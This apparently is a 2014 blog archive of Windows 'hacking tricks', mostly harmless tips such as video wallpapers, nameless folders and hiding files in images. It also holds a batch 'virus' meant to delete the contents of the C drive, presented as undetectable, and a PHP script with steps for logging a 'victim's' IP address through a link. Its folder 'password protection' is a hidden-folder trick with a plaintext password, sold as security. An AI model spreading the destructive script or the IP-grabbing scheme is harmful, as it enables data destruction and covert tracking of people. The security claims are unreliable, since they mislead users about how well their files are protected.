Pages

Sunday, 19 January 2014

Uninstall WindowsProgrammes With A Right Click

Uninstall Windows programmes with a right click
As you know when ever we want to uninstall any windows program we need to go to control panel and manually uninstall them. But here is a trick which let you uninstall anywindows program from their desktop shortcutsMenuUninstaller is a free peace of software that adds an "Uninstall" option to the Windows context menu so you can remove programs from their shortcuts.

How To Uninstall WindowsProgrammes With A Right Click ?

  1. Download  Menu Uninstaller  and install it on your pc.
  2. After installing an uninstall option will be added to your windows context menu.
  3. Right click on any shortcut and you will See Uninstall option as below.
Uninstall WindowsProgrammes With A Right Click
  4. Click on it to uninstall any programme.

Adding Background Images To Windows Drives

Isn't it cool to have great wallpaper for your desktop but it might be more fun to have amazing background images for your drives. Drives Background Imageis a Windows freeware application that allows you to set a wallpaper for eachdisk drive on your computer. This program is very easy to use you only need to select wallpaper for your background, it also provide option to change icons of your drives, changing text color and it provide instant preview of your selected settings. But  keep in mind that Windows 7 users need administrator privileges while running this program, as the application attempts to modify the configuration of the local hard drives. Its pretty nice program for window customization and every one  should try this tool. Follow below steps to download and learn to use this program.


   Features of the program:

  • Autodetect Available Drives
  • Set Background To Multiple Drives
  • Remove Background From Multiple Drives
  • Set Icons To Multiple Drives
  • Remove Icon From Multiple Drives
  • Auto Recover Default Icons
  •  Events Log
  • Drive Preview
  • Icon Preview
  • Easy Clean GUI


Setting Video As Desktop Wallpaper


video wallpaper
Ever wanted to set cool videos as yourcomputers Desktop Wallpaper, then you came to right place. Today in this post i will teach you how to set videosas your Desktop Wallpaper with a simple nice little trick and small tool or software that mostly every one has installed on their computer or laptop. This trick works on  Windows Xp as well as it works on windows 7. Go through below post to learn this simple trick.



How to set video as desktop wallpaper ?

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper


   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

Password Protect Any Folder Without Any Software

In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Simple Trick To Use Web Browsers As Text Editor


 Web Browsers As Text Editor
In this tutorial i will show you a simple and interesting trick to use your web browsersuch as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.

How To Do ?

   1 Copy below code in browser Url Section

 data:text/html, <html contenteditable>

   2. Now Press Enter.
   3. Now you can type anything as would do on any other text editor like Notepad.
   4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)

Simple Trick To Convert A Webpage To PDF File



webpage as pdf

In this post i will teach a simple trick or browser feature that let you convert any webpage into PSD file format, which might help you to read your favourite articles offline. So lets get started.

How To Save Web Page To PDF File ?

1. Open the Google Chrome Browser on your PC or MAC 
2. Then go to the web page that you want to convert as a PDF. 
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document

How To Grab Someone IP Address ?


In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?

    1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>

          2. Now make Free account on any of  the free web hosting sites Ripway or on My3gb .
          3. Now Upload Grab.php to your web hosting site.
          4. Copy the link of your  uploaded file and send it to victim.
          5. As soon as victim will click on your link his ip will be saved in your free web hostingsite.
          6. Enjoy you are Done !!

        Finding Ip Address Of A Website Using Command Prompt Or CMD

        In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

        How to find IP ?

        1. Go to Start > Type CMD and press Enter.
        2. Now write Ping followed by website URL whose IP you want to find.
        finding ip adddress of website

        3. It will take less then a second and come up with the results as shown below.
        finding ip adddress of website

        In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

        Learn To Make Dangerous Virus In A Minute

        computer virus
        In my previous post i had teach you guysto create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet verypowerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

        What will this virus do ?  

        You will create this virus using batch file programming. This virus will delete the C Drivecompletely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

        How to Make the virus ?

           1. Open Notepad and copy below code into it.

        @Echo off
        Del C:\ *.* |y

           2. Save this file as virus.bat (Name can be anything but .bat is must)
           3. Now, running this file will delete all the content of C Drive.


        Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

        Saturday, 18 January 2014

        Making Nameless Folder In Windows

        creating nameless folder
        In this small tutorial i will show you a smilpe windows trick. Basically you can not makefolder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows  operating system.


        How To Make Nameless Folder

        Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
        creating nameless folder
        1. Make a Newfolder on desktop or where ever you want.
        2. Right click on this newly created folder and select Rename.
        3. Erase the text showing "New Folder".
        4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
        5. After that leave alt key and Press enter.
        6. Done you just created nameless folder.

        Learn To Hide Files Behind The Images


        hide files behind images

        There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but intodays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

        How To Hide File Behind Image ?

        In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
        1. Select an image to be used for hiding file behind the image.
        2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
        3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
        4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
        cd desktop
        hide files behind images

        5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
         Copy /b imagename.jpg + filename.rar finalimage.jpg
        hide files behind images
        • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
        • Replace filename with name of your file you want to hide. It must be in .rar format.
        • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
        6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

        How To Access Hidden File ?

        To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

            1. Open winrar
            2. Now locate your image and open it or simply drag your image in winrar.
            3. Extract the file and done.